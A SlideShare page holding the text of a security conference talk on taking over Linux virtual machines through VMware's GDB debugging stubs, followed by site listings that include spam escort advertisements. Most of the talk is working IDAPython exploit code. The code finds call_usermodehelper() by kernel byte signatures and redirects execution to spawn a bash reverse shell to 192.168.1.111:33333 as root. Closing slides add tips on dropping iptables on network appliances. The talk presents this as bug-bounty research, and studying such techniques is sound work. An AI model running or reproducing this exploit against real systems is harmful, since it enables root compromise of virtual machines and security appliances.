SlideShare a Scribd company logo

0x01 - Breaking into Linux VMs for Fun and Profit.pdf

S
scribdsituation719

0x01 - Breaking into Linux VMs for Fun and Profit

Software
1 of 38
Download to read offline
Breaking into Linux VMs For Fun and Profit Russell Sanford xort @ sploit.online
0x01 • I Originally created this technique in 2016 and did a talk called… Compromising Linux Virtual Machines with Debugging Mechanisms (slideshare .net) https://www.slideshare.net/xort/compromising-linux-virtual-machines-with-debugging-mechanisms This technique allows you to seize control of a (on-prem) Linux Virtual Machine and spawn a connect back root shell from kernel land. (Ring0 -> Ring3 -> Us) Machines relying on LUKs boot-key encryption are not secure and access to their appliances code base can be audited for vulnerabilities. Breaking Into Linux VMs for Fun and Profit
0x02 This attack opened the door to finding >30 Remote Root (auth and pre- auth) vulnerabilities in security vendor’s products (Citrix, Sophos, Barracuda, Bluecoat, Sonicwall, etc…) Made me > $20k in bug bounties ( the ‘profit’ :D ) Got me up to #107 on bugcrowd’s ~50k signed up researchers Breaking Into Linux VMs for Fun and Profit
0x03 Vmware added GDB Plugs to their products allowing for OS developers to diagnose code in their Virtual Machines. I adapted methodology used in UNIX Ptrace styled attacks to see what fun could be had… Breaking Into Linux VMs for Fun and Profit So What Brought this on…
0x04 Breaking Into Linux VMs for Fun and Profit int call_usermodehelper ( const char * path, char ** argv, char ** envp, int wait); Name call_usermodehelper — prepare and start a usermode application Synopsis (FROM KERNEL LAND) Were starting off in Kernel Land… This allows us to go from RING 0 (kernel) to RING3 (userland) Where we can launch our attack. :D
0x05 Breaking Into Linux VMs for Fun and Profit Finding Bytes Signatures… To find Pathways to API Locate SIMILAR sections of code from multiple target’s using unique assembly sequences Compare bytes and find sections with gaps of indifference that realign later in the code for more unique samples
0x06 Breaking Into Linux VMs for Fun and Profit Configuring IDA PRO And VMware to have some fun…
0x07 • VMware Workstation >= 5.0 • VMware Player >= 3.0 • Fusion • Allow RWX of memory, ability to single-step, etc @ kernel level • When attaching to a Linux VM we land in native_safe_halt() Breaking Into Linux VMs for Fun and Profit VMWARE GDB STUBS
0x08 Breaking Into Linux VMs for Fun and Profit Configuring IDA Pro to connect to Vmware GDB server
0x09 Breaking Into Linux VMs for Fun and Profit Configuring IDA Pro to connect to Vmware GDB server
0x0A Breaking Into Linux VMs for Fun and Profit Configuring IDA Pro to connect to Vmware GDB server
0x0B ORIGINAL ATTACK (2016) Breaking Into Linux VMs for Fun and Profit
0x0C Breaking Into Linux VMs for Fun and Profit ORIGINAL ATTACK (2016)
0x0D Breaking Into Linux VMs for Fun and Profit THE REVISED ATTACK (2023) API Identification… THE PROBLEM: The Old Way was slow and would sometimes fail with debugging over a network… I needed to come up with a solution to find call_usermodehelper() API in a quicker and more elegant way. THE SOLUTION: Instead of one large sweep of memory looking for a single byte signature… I would analyze the kernel and write a routine to find functions that called into functions, that would call into functions, that would call into functions (3 layers deep) and end up at an address CLOSE ( 0xFFFFFFFFF0000 range) to call_usermodehelper() From Here, a final memory fingerprint byte scan is done to identify call_usermodehelper()
0x0E Breaking Into Linux VMs for Fun and Profit THE REVISED ATTACK (2023) API Pathway Identification Map Routine (Searches 4 Levels Deep in Code XREFs) for an address close to call_usermodehelper()
0x0F Breaking Into Linux VMs for Fun and Profit
0x10 • THE REVISED ATTACK (2023) Shellcode? Who needs Shellcode… :D …..Not Us. • We change RIP to call_usermodehelp()’s entry point and set register values to ARGV[] data we store backwards in stack • When it reaches the end of the function – it returns to what native_safe_halt() would have and it’s as if we never made a change • Return of execution is smoothly given back to the OS – but our shell has been spawned. :D Breaking Into Linux VMs for Fun and Profit
0x11 • THE REVISED ATTACK (2023) Breaking Into Linux VMs for Fun and Profit We Change RIP from native_safe_halt() to call_usermodehelper() without any patches to the code. Call_usermodehelper() will cleanly exit ounce our shell is spawned by returning to where native_safe_halt() was supposed to
0x12 Breaking Into Linux VMs for Fun and Profit THE REVISED ATTACK (2023) 1) API Identification through: A) 1st Round - Memory Signature scan to find Code Xref’ed to… B) Extracting Pointer from CALL instruction ( and calculating 2’s compliment offset) C) 2nd Round – Memory Signature scan to find Code Xref’ed to… D) Extracting Pointer from CALL instruction ( and calculating 2’s compliment offset) E) 3rd Round – Memory Scanning for call_usermodehelper()’s API address 2) Backing up Machine State - Register Values and Memory Area to be used for executing Shellcode (current RIP address) 3) Creating ARGV[] data somewhere back in the Stack 4) Restoring Machine State – Restoring Register Values – Setting RIP back – Patching back memory we overwrote to execute Shellcode
0x13 Breaking Into Linux VMs for Fun and Profit The path to call_usermodehelper() …
0x14 Breaking Into Linux VMs for Fun and Profit We start in native_safe_halt() … Scan Up in Memory for acpi_os_unmap_iomem() Using byte signature pattern: 48 B9 22 01 00 00 00 00 AD DE ... acpi_os_unmap_iomem_sig = "48 B9 22 01 00 00 00 00 AD DE” sig_addr = idc.find_binary(addr, SEARCH_UP, acpi_os_unmap_iomem_sig)
0x15 Breaking Into Linux VMs for Fun and Profit acpi_os_unmap_iomem() we find a CALL to queue_rcu_work() which we extract the destinations API from the CALL instruction which is located 0x2d bytes from our byte signature offset_to_queue_rcu_work = ctypes.c_long(unpack("<L", get_bytes((sig_addr + 0x2d),4,0))[0]).value
0x16 Breaking Into Linux VMs for Fun and Profit queue_rcu_work() resides close to call_usermodehelper() in memory … call_usermodehelper_sig = "55 83 F9 01 48 89 E5 41 56 41 89 CE 41 55 49 89 FD“ sig_addr = idc.find_binary(queue_rcu_work_address, SEARCH_UP, call_usermodehelper_sig) We Search up for the binary pattern: 55 83 F9 01 48 89 E5 41 56 41 89 CE 41 55 49 89 FD to find it.
0x17 Breaking Into Linux VMs for Fun and Profit ARGV in Memory… • Top area is set aside to hold QWORD of pointers to strings used in ARGV array • Ends with NULL (Qword) to signify end of array • Bottom area will hold actual string data
0x18 Breaking Into Linux VMs for Fun and Profit con_back_ip = "192.168.1.111" con_back_port = "33333" command_to_execute = "bash -i >& /dev/tcp/" + con_back_ip + "/" + con_back_port + " 0>&1“ # CMD in memory for ARGV... cmd_runner_prefix = b"/bin/bashx00-cx00“ # payload / command to execute location = get_reg_value("rsp") - 0x1000 location2= get_reg_value("rsp") - 0x1100 idaapi.dbg_write_memory(location, (cmd_runner_prefix + command_to_execute.encode('latin-1')) + b"x00" ) set_reg_value(location, "rdi") # RDI = program to execute # RSI = construct argv[] idaapi.dbg_write_memory(location2, pack("<Q", location)) # program name and start of argv idaapi.dbg_write_memory(location2+8, pack("<Q", location+10)) idaapi.dbg_write_memory(location2+16, pack("<Q", location+13)) idaapi.dbg_write_memory(location2+24, pack("<Q", 0x0)) # end of argv[] set_reg_value(location2, "rsi") # RSI = argv[] set_reg_value(0x0, "rdx") # RDX = envp[] (null) set_reg_value( call_usermodehelper , "rip") # RIP to call_usermodehelper()
0x19 Breaking Into Linux VMs for Fun and Profit Exploit in action… Root Shell 
0x17 Breaking Into Linux VMs for Fun and Profit The do_coredump() method Universal Unlock Method for ALL 5x 6x Kernels ( also… much slower :D ! Go grab food and wait! )
0x1A Breaking Into Linux VMs for Fun and Profit When we attach to a running Linux kernel using GDB stubs, we land in a call to native_safe_halt(). This is where our journey begins… :D
0x1B Breaking Into Linux VMs for Fun and Profit do_coredump_sig1 = "BA 00 02 00 00 BE C0 0C 00 00 E8 ?? ?? ?? ?? 48 85 C0“ sig_addr = idc.find_binary(addr, SEARCH_UP, do_coredump_sig1) We Search up for the binary pattern: BA 00 02 00 00 BE C0 0C 00 00 E8 ?? ?? ?? ?? 48 85 C0 to land in do_coredump()
0x1C Breaking Into Linux VMs for Fun and Profit do_coredump_sig2 = "50 49 8B“ sig_addr = idc.find_binary(sig_addr, SEARCH_UP, do_coredump_sig2) We Search up for the binary pattern: 50 49 8B to land the call to call_usermodehelper_setup() near by…
0x1D Breaking Into Linux VMs for Fun and Profit do_coredump_sig3 = "E8 ?? ?? ?? ?? 44 8b“ sig_addr = idc.find_binary(sig_addr, SEARCH_DOWN, do_coredump_sig3) call_usermodehelper_setup = (sig_addr+1) + ctypes.c_long(unpack("<L", get_bytes((sig_addr + 0x1),4,0))[0]).value We Search down for the binary pattern: E8 ?? ?? ?? ?? 44 8b to find actual address reference
0x1E Breaking Into Linux VMs for Fun and Profit We dereference address of call_usermodehelper_setup() knowing call_usermodehelper() is near by Just bytes below in a following function declaration…. VERY CLOSE NOW! :D
0x1F Breaking Into Linux VMs for Fun and Profit call_usermodehelper_sig1 = "81 E6 60 ?? FF FF 48 89 D3 BA ?? 00 00 00 81 C6 C0 0D 00 00“ sig_addr = idc.find_binary(call_usermodehelper_setup, SEARCH_DOWN, call_usermodehelper_sig1) We Search down for the binary pattern: 81 E6 60 ?? FF FF 48 89 D3 BA ?? 00 00 00 81 C6 C0 0D 00 00 to land in call_usermodehelper() …
0x20 Breaking Into Linux VMs for Fun and Profit call_usermodehelper_sig2 = "E8 ?? ?? ?? ?? 55 83 F9 01“ call_usermodehelper = idc.find_binary(sig_addr, SEARCH_UP, call_usermodehelper_sig2) Lastly, we search up to find the beginning bytes of the function: call_usermodehelper() … GAME TIME! :D
0x21 Breaking Into Linux VMs for Fun and Profit The path to call_usermodehelper() using the do_coredump() route/method…
0x22 Breaking Into Linux VMs for Fun and Profit Root Shell 
0x23 Breaking Into Linux VMs for Fun and Profit Tips for compromising Network Appliances: • Prelude payload with call to Drop IPTABLES • Try adding a serial connection and using a serial connect back 1-liner
0x24 Breaking Into Linux VMs for Fun and Profit Thanks! Russell Sanford xort@sploit.online

Recommended

0x01 - Breaking into Linux VMs for Fun and Profit
0x01 - Breaking into Linux VMs for Fun and Profit0x01 - Breaking into Linux VMs for Fun and Profit
0x01 - Breaking into Linux VMs for Fun and ProfitRussell Sanford
 
Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...
Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...
Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...Vincenzo Iozzo
 
PVS-Studio, a solution for resource intensive applications development
PVS-Studio, a solution for resource intensive applications developmentPVS-Studio, a solution for resource intensive applications development
PVS-Studio, a solution for resource intensive applications developmentOOO "Program Verification Systems"
 
DEF CON 27 - XILING GONG PETER PI - exploiting qualcom wlan and modem over th...
DEF CON 27 - XILING GONG PETER PI - exploiting qualcom wlan and modem over th...DEF CON 27 - XILING GONG PETER PI - exploiting qualcom wlan and modem over th...
DEF CON 27 - XILING GONG PETER PI - exploiting qualcom wlan and modem over th...Felipe Prado
 
Shellcoding in linux
Shellcoding in linuxShellcoding in linux
Shellcoding in linuxAjin Abraham
 
Offensive cyber security: Smashing the stack with Python
Offensive cyber security: Smashing the stack with PythonOffensive cyber security: Smashing the stack with Python
Offensive cyber security: Smashing the stack with PythonMalachi Jones
 
Writing Metasploit Plugins
Writing Metasploit PluginsWriting Metasploit Plugins
Writing Metasploit Pluginsamiable_indian
 
Lost in Translation: When Industrial Protocol Translation goes Wrong [CONFide...
Lost in Translation: When Industrial Protocol Translation goes Wrong [CONFide...Lost in Translation: When Industrial Protocol Translation goes Wrong [CONFide...
Lost in Translation: When Industrial Protocol Translation goes Wrong [CONFide...Marco Balduzzi
 

Recommended

0x01 - Breaking into Linux VMs for Fun and Profit
0x01 - Breaking into Linux VMs for Fun and Profit0x01 - Breaking into Linux VMs for Fun and Profit
0x01 - Breaking into Linux VMs for Fun and ProfitRussell Sanford
 
Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...
Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...
Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...Vincenzo Iozzo
 
PVS-Studio, a solution for resource intensive applications development
PVS-Studio, a solution for resource intensive applications developmentPVS-Studio, a solution for resource intensive applications development
PVS-Studio, a solution for resource intensive applications developmentOOO "Program Verification Systems"
 
DEF CON 27 - XILING GONG PETER PI - exploiting qualcom wlan and modem over th...
DEF CON 27 - XILING GONG PETER PI - exploiting qualcom wlan and modem over th...DEF CON 27 - XILING GONG PETER PI - exploiting qualcom wlan and modem over th...
DEF CON 27 - XILING GONG PETER PI - exploiting qualcom wlan and modem over th...Felipe Prado
 
Shellcoding in linux
Shellcoding in linuxShellcoding in linux
Shellcoding in linuxAjin Abraham
 
Offensive cyber security: Smashing the stack with Python
Offensive cyber security: Smashing the stack with PythonOffensive cyber security: Smashing the stack with Python
Offensive cyber security: Smashing the stack with PythonMalachi Jones
 
Writing Metasploit Plugins
Writing Metasploit PluginsWriting Metasploit Plugins
Writing Metasploit Pluginsamiable_indian
 
Lost in Translation: When Industrial Protocol Translation goes Wrong [CONFide...
Lost in Translation: When Industrial Protocol Translation goes Wrong [CONFide...Lost in Translation: When Industrial Protocol Translation goes Wrong [CONFide...
Lost in Translation: When Industrial Protocol Translation goes Wrong [CONFide...Marco Balduzzi
 
Buffer overflow – Smashing The Stack
Buffer overflow – Smashing The StackBuffer overflow – Smashing The Stack
Buffer overflow – Smashing The StackTomer Zait
 
Buffer Overflow - Smashing the Stack
Buffer Overflow - Smashing the StackBuffer Overflow - Smashing the Stack
Buffer Overflow - Smashing the StackironSource
 
A Decompiler for Blackhain-Based Smart Contracts Bytecode
A Decompiler for Blackhain-Based Smart Contracts BytecodeA Decompiler for Blackhain-Based Smart Contracts Bytecode
A Decompiler for Blackhain-Based Smart Contracts BytecodeShakacon
 
NYU hacknight, april 6, 2016
NYU hacknight, april 6, 2016NYU hacknight, april 6, 2016
NYU hacknight, april 6, 2016Mikhail Sosonkin
 
r2con 2017 r2cLEMENCy
r2con 2017 r2cLEMENCyr2con 2017 r2cLEMENCy
r2con 2017 r2cLEMENCyRay Song
 
Semtex.c [CVE-2013-2094] - A Linux Privelege Escalation
Semtex.c [CVE-2013-2094] - A Linux Privelege EscalationSemtex.c [CVE-2013-2094] - A Linux Privelege Escalation
Semtex.c [CVE-2013-2094] - A Linux Privelege EscalationKernel TLV
 
Compromising Linux Virtual Machines with Debugging Mechanisms
Compromising Linux Virtual Machines with Debugging MechanismsCompromising Linux Virtual Machines with Debugging Mechanisms
Compromising Linux Virtual Machines with Debugging MechanismsRussell Sanford
 
Ansible101
Ansible101Ansible101
Ansible101Hideki Saito
 
[2007 CodeEngn Conference 01] dual5651 - Windows 커널단의 후킹
[2007 CodeEngn Conference 01] dual5651 - Windows 커널단의 후킹[2007 CodeEngn Conference 01] dual5651 - Windows 커널단의 후킹
[2007 CodeEngn Conference 01] dual5651 - Windows 커널단의 후킹GangSeok Lee
 
[若渴計畫] Challenges and Solutions of Window Remote Shellcode
[若渴計畫] Challenges and Solutions of Window Remote Shellcode[若渴計畫] Challenges and Solutions of Window Remote Shellcode
[若渴計畫] Challenges and Solutions of Window Remote ShellcodeAj MaChInE
 
D1 t2 jonathan brossard - breaking virtualization by switching to virtual 8...
D1 t2 jonathan brossard - breaking virtualization by switching to virtual 8...D1 t2 jonathan brossard - breaking virtualization by switching to virtual 8...
D1 t2 jonathan brossard - breaking virtualization by switching to virtual 8...kbour23
 
200 Open Source Projects Later: Source Code Static Analysis Experience
200 Open Source Projects Later: Source Code Static Analysis Experience200 Open Source Projects Later: Source Code Static Analysis Experience
200 Open Source Projects Later: Source Code Static Analysis ExperienceAndrey Karpov
 
Trap Handling in Linux
Trap Handling in LinuxTrap Handling in Linux
Trap Handling in LinuxYongraeJo
 
Track c-High speed transaction-based hw-sw coverification -eve
Track c-High speed transaction-based hw-sw coverification -eveTrack c-High speed transaction-based hw-sw coverification -eve
Track c-High speed transaction-based hw-sw coverification -evechiportal
 
Playing CTFs for Fun & Profit
Playing CTFs for Fun & ProfitPlaying CTFs for Fun & Profit
Playing CTFs for Fun & Profitimpdefined
 
Linux Initialization Process (1)
Linux Initialization Process (1)Linux Initialization Process (1)
Linux Initialization Process (1)shimosawa
 
Attack your Trusted Core
Attack your Trusted CoreAttack your Trusted Core
Attack your Trusted CoreDi Shen
 
BKK16-211 Internet of Tiny Linux (io tl)- Status and Progress
BKK16-211 Internet of Tiny Linux (io tl)- Status and ProgressBKK16-211 Internet of Tiny Linux (io tl)- Status and Progress
BKK16-211 Internet of Tiny Linux (io tl)- Status and ProgressLinaro
 
C Programming Training in Ambala ! Batra Computer Centre
C Programming Training in Ambala ! Batra Computer CentreC Programming Training in Ambala ! Batra Computer Centre
C Programming Training in Ambala ! Batra Computer Centrejatin batra
 
Hot Code is Faster Code - Addressing JVM Warm-up
Hot Code is Faster Code - Addressing JVM Warm-upHot Code is Faster Code - Addressing JVM Warm-up
Hot Code is Faster Code - Addressing JVM Warm-upMark Price
 
Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...
Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...
Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...soniya singh
 
chapter--4-software-project-planning.ppt
chapter--4-software-project-planning.pptchapter--4-software-project-planning.ppt
chapter--4-software-project-planning.pptkotipi9215
 

More Related Content

Similar to 0x01 - Breaking into Linux VMs for Fun and Profit.pdf

Buffer overflow – Smashing The Stack
Buffer overflow – Smashing The StackBuffer overflow – Smashing The Stack
Buffer overflow – Smashing The StackTomer Zait
 
Buffer Overflow - Smashing the Stack
Buffer Overflow - Smashing the StackBuffer Overflow - Smashing the Stack
Buffer Overflow - Smashing the StackironSource
 
A Decompiler for Blackhain-Based Smart Contracts Bytecode
A Decompiler for Blackhain-Based Smart Contracts BytecodeA Decompiler for Blackhain-Based Smart Contracts Bytecode
A Decompiler for Blackhain-Based Smart Contracts BytecodeShakacon
 
NYU hacknight, april 6, 2016
NYU hacknight, april 6, 2016NYU hacknight, april 6, 2016
NYU hacknight, april 6, 2016Mikhail Sosonkin
 
r2con 2017 r2cLEMENCy
r2con 2017 r2cLEMENCyr2con 2017 r2cLEMENCy
r2con 2017 r2cLEMENCyRay Song
 
Semtex.c [CVE-2013-2094] - A Linux Privelege Escalation
Semtex.c [CVE-2013-2094] - A Linux Privelege EscalationSemtex.c [CVE-2013-2094] - A Linux Privelege Escalation
Semtex.c [CVE-2013-2094] - A Linux Privelege EscalationKernel TLV
 
Compromising Linux Virtual Machines with Debugging Mechanisms
Compromising Linux Virtual Machines with Debugging MechanismsCompromising Linux Virtual Machines with Debugging Mechanisms
Compromising Linux Virtual Machines with Debugging MechanismsRussell Sanford
 
[2007 CodeEngn Conference 01] dual5651 - Windows 커널단의 후킹
[2007 CodeEngn Conference 01] dual5651 - Windows 커널단의 후킹[2007 CodeEngn Conference 01] dual5651 - Windows 커널단의 후킹
[2007 CodeEngn Conference 01] dual5651 - Windows 커널단의 후킹GangSeok Lee
 
[若渴計畫] Challenges and Solutions of Window Remote Shellcode
[若渴計畫] Challenges and Solutions of Window Remote Shellcode[若渴計畫] Challenges and Solutions of Window Remote Shellcode
[若渴計畫] Challenges and Solutions of Window Remote ShellcodeAj MaChInE
 
D1 t2 jonathan brossard - breaking virtualization by switching to virtual 8...
D1 t2 jonathan brossard - breaking virtualization by switching to virtual 8...D1 t2 jonathan brossard - breaking virtualization by switching to virtual 8...
D1 t2 jonathan brossard - breaking virtualization by switching to virtual 8...kbour23
 
200 Open Source Projects Later: Source Code Static Analysis Experience
200 Open Source Projects Later: Source Code Static Analysis Experience200 Open Source Projects Later: Source Code Static Analysis Experience
200 Open Source Projects Later: Source Code Static Analysis ExperienceAndrey Karpov
 
Trap Handling in Linux
Trap Handling in LinuxTrap Handling in Linux
Trap Handling in LinuxYongraeJo
 
Track c-High speed transaction-based hw-sw coverification -eve
Track c-High speed transaction-based hw-sw coverification -eveTrack c-High speed transaction-based hw-sw coverification -eve
Track c-High speed transaction-based hw-sw coverification -evechiportal
 
Playing CTFs for Fun & Profit
Playing CTFs for Fun & ProfitPlaying CTFs for Fun & Profit
Playing CTFs for Fun & Profitimpdefined
 
Linux Initialization Process (1)
Linux Initialization Process (1)Linux Initialization Process (1)
Linux Initialization Process (1)shimosawa
 
Attack your Trusted Core
Attack your Trusted CoreAttack your Trusted Core
Attack your Trusted CoreDi Shen
 
BKK16-211 Internet of Tiny Linux (io tl)- Status and Progress
BKK16-211 Internet of Tiny Linux (io tl)- Status and ProgressBKK16-211 Internet of Tiny Linux (io tl)- Status and Progress
BKK16-211 Internet of Tiny Linux (io tl)- Status and ProgressLinaro
 
C Programming Training in Ambala ! Batra Computer Centre
C Programming Training in Ambala ! Batra Computer CentreC Programming Training in Ambala ! Batra Computer Centre
C Programming Training in Ambala ! Batra Computer Centrejatin batra
 
Hot Code is Faster Code - Addressing JVM Warm-up
Hot Code is Faster Code - Addressing JVM Warm-upHot Code is Faster Code - Addressing JVM Warm-up
Hot Code is Faster Code - Addressing JVM Warm-upMark Price
 

Similar to 0x01 - Breaking into Linux VMs for Fun and Profit.pdf (20)

Buffer overflow – Smashing The Stack
Buffer overflow – Smashing The StackBuffer overflow – Smashing The Stack
Buffer overflow – Smashing The Stack
 
Buffer Overflow - Smashing the Stack
Buffer Overflow - Smashing the StackBuffer Overflow - Smashing the Stack
Buffer Overflow - Smashing the Stack
 
A Decompiler for Blackhain-Based Smart Contracts Bytecode
A Decompiler for Blackhain-Based Smart Contracts BytecodeA Decompiler for Blackhain-Based Smart Contracts Bytecode
A Decompiler for Blackhain-Based Smart Contracts Bytecode
 
NYU hacknight, april 6, 2016
NYU hacknight, april 6, 2016NYU hacknight, april 6, 2016
NYU hacknight, april 6, 2016
 
r2con 2017 r2cLEMENCy
r2con 2017 r2cLEMENCyr2con 2017 r2cLEMENCy
r2con 2017 r2cLEMENCy
 
Semtex.c [CVE-2013-2094] - A Linux Privelege Escalation
Semtex.c [CVE-2013-2094] - A Linux Privelege EscalationSemtex.c [CVE-2013-2094] - A Linux Privelege Escalation
Semtex.c [CVE-2013-2094] - A Linux Privelege Escalation
 
Compromising Linux Virtual Machines with Debugging Mechanisms
Compromising Linux Virtual Machines with Debugging MechanismsCompromising Linux Virtual Machines with Debugging Mechanisms
Compromising Linux Virtual Machines with Debugging Mechanisms
 
Ansible101
Ansible101Ansible101
Ansible101
 
[2007 CodeEngn Conference 01] dual5651 - Windows 커널단의 후킹
[2007 CodeEngn Conference 01] dual5651 - Windows 커널단의 후킹[2007 CodeEngn Conference 01] dual5651 - Windows 커널단의 후킹
[2007 CodeEngn Conference 01] dual5651 - Windows 커널단의 후킹
 
[若渴計畫] Challenges and Solutions of Window Remote Shellcode
[若渴計畫] Challenges and Solutions of Window Remote Shellcode[若渴計畫] Challenges and Solutions of Window Remote Shellcode
[若渴計畫] Challenges and Solutions of Window Remote Shellcode
 
D1 t2 jonathan brossard - breaking virtualization by switching to virtual 8...
D1 t2 jonathan brossard - breaking virtualization by switching to virtual 8...D1 t2 jonathan brossard - breaking virtualization by switching to virtual 8...
D1 t2 jonathan brossard - breaking virtualization by switching to virtual 8...
 
200 Open Source Projects Later: Source Code Static Analysis Experience
200 Open Source Projects Later: Source Code Static Analysis Experience200 Open Source Projects Later: Source Code Static Analysis Experience
200 Open Source Projects Later: Source Code Static Analysis Experience
 
Trap Handling in Linux
Trap Handling in LinuxTrap Handling in Linux
Trap Handling in Linux
 
Track c-High speed transaction-based hw-sw coverification -eve
Track c-High speed transaction-based hw-sw coverification -eveTrack c-High speed transaction-based hw-sw coverification -eve
Track c-High speed transaction-based hw-sw coverification -eve
 
Playing CTFs for Fun & Profit
Playing CTFs for Fun & ProfitPlaying CTFs for Fun & Profit
Playing CTFs for Fun & Profit
 
Linux Initialization Process (1)
Linux Initialization Process (1)Linux Initialization Process (1)
Linux Initialization Process (1)
 
Attack your Trusted Core
Attack your Trusted CoreAttack your Trusted Core
Attack your Trusted Core
 
BKK16-211 Internet of Tiny Linux (io tl)- Status and Progress
BKK16-211 Internet of Tiny Linux (io tl)- Status and ProgressBKK16-211 Internet of Tiny Linux (io tl)- Status and Progress
BKK16-211 Internet of Tiny Linux (io tl)- Status and Progress
 
C Programming Training in Ambala ! Batra Computer Centre
C Programming Training in Ambala ! Batra Computer CentreC Programming Training in Ambala ! Batra Computer Centre
C Programming Training in Ambala ! Batra Computer Centre
 
Hot Code is Faster Code - Addressing JVM Warm-up
Hot Code is Faster Code - Addressing JVM Warm-upHot Code is Faster Code - Addressing JVM Warm-up
Hot Code is Faster Code - Addressing JVM Warm-up
 

Recently uploaded

Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...
Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...
Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...soniya singh
 
chapter--4-software-project-planning.ppt
chapter--4-software-project-planning.pptchapter--4-software-project-planning.ppt
chapter--4-software-project-planning.pptkotipi9215
 
What are the features of Vehicle Tracking System?
What are the features of Vehicle Tracking System?What are the features of Vehicle Tracking System?
What are the features of Vehicle Tracking System?Watsoo Telematics
 
why an Opensea Clone Script might be your perfect match.pdf
why an Opensea Clone Script might be your perfect match.pdfwhy an Opensea Clone Script might be your perfect match.pdf
why an Opensea Clone Script might be your perfect match.pdfjoe51371421
 
Call Girls in Naraina Delhi 💯Call Us 🔝8264348440🔝
Call Girls in Naraina Delhi 💯Call Us 🔝8264348440🔝Call Girls in Naraina Delhi 💯Call Us 🔝8264348440🔝
Call Girls in Naraina Delhi 💯Call Us 🔝8264348440🔝soniya singh
 
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed Data
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed DataAlluxio Monthly Webinar | Cloud-Native Model Training on Distributed Data
Alluxio Monthly Webinar | Cloud-Native Model Training on Distributed DataAlluxio, Inc.
 
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...
Building a General PDE Solving Framework with Symbolic-Numeric Scientific Mac...stazi3110
 
Implementing Zero Trust strategy with Azure
Implementing Zero Trust strategy with AzureImplementing Zero Trust strategy with Azure
Implementing Zero Trust strategy with AzureDinusha Kumarasiri
 
EY_Graph Database Powered Sustainability
EY_Graph Database Powered SustainabilityEY_Graph Database Powered Sustainability
EY_Graph Database Powered SustainabilityNeo4j
 
Engage Usergroup 2024 - The Good The Bad_The Ugly
Engage Usergroup 2024 - The Good The Bad_The UglyEngage Usergroup 2024 - The Good The Bad_The Ugly
Engage Usergroup 2024 - The Good The Bad_The UglyFrank van der Linden
 
Unit 1.1 Excite Part 1, class 9, cbse...
Unit 1.1 Excite Part 1, class 9, cbse...Unit 1.1 Excite Part 1, class 9, cbse...
Unit 1.1 Excite Part 1, class 9, cbse...aditisharan08
 
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...
Short Story: Unveiling the Reasoning Abilities of Large Language Models by Ke...kellynguyen01
 
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...
(Genuine) Escort Service Lucknow | Starting ₹,5K To @25k with A/C 🧑🏽‍❤️‍🧑🏻 89...gurkirankumar98700
 
Building Real-Time Data Pipelines: Stream & Batch Processing workshop Slide
Building Real-Time Data Pipelines: Stream & Batch Processing workshop SlideBuilding Real-Time Data Pipelines: Stream & Batch Processing workshop Slide
Building Real-Time Data Pipelines: Stream & Batch Processing workshop SlideChristina Lin
 
buds n tech IT solutions
buds n tech IT solutionsbuds n tech IT solutions
buds n tech IT solutionsmonugehlot87
 
What is Fashion PLM and Why Do You Need It
What is Fashion PLM and Why Do You Need ItWhat is Fashion PLM and Why Do You Need It
What is Fashion PLM and Why Do You Need ItWave PLM
 
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASE
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASEBATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASE
BATTLEFIELD ORM: TIPS, TACTICS AND STRATEGIES FOR CONQUERING YOUR DATABASEOrtus Solutions, Corp
 
The Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdf
The Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdfThe Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdf
The Essentials of Digital Experience Monitoring_ A Comprehensive Guide.pdfkalichargn70th171
 
Der Spagat zwischen BIAS und FAIRNESS (2024)
Der Spagat zwischen BIAS und FAIRNESS (2024)Der Spagat zwischen BIAS und FAIRNESS (2024)
Der Spagat zwischen BIAS und FAIRNESS (2024)OPEN KNOWLEDGE GmbH
 
cybersecurity notes for mca students for learning
cybersecurity notes for mca students for learningcybersecurity notes for mca students for learning
cybersecurity notes for mca students for learningVitsRangannavar
 

Recently uploaded (20)

Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...
Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...Russian Call Girls in Karol Bagh Aasnvi ➡️ 8264348440 💋📞 Independent Escort S...
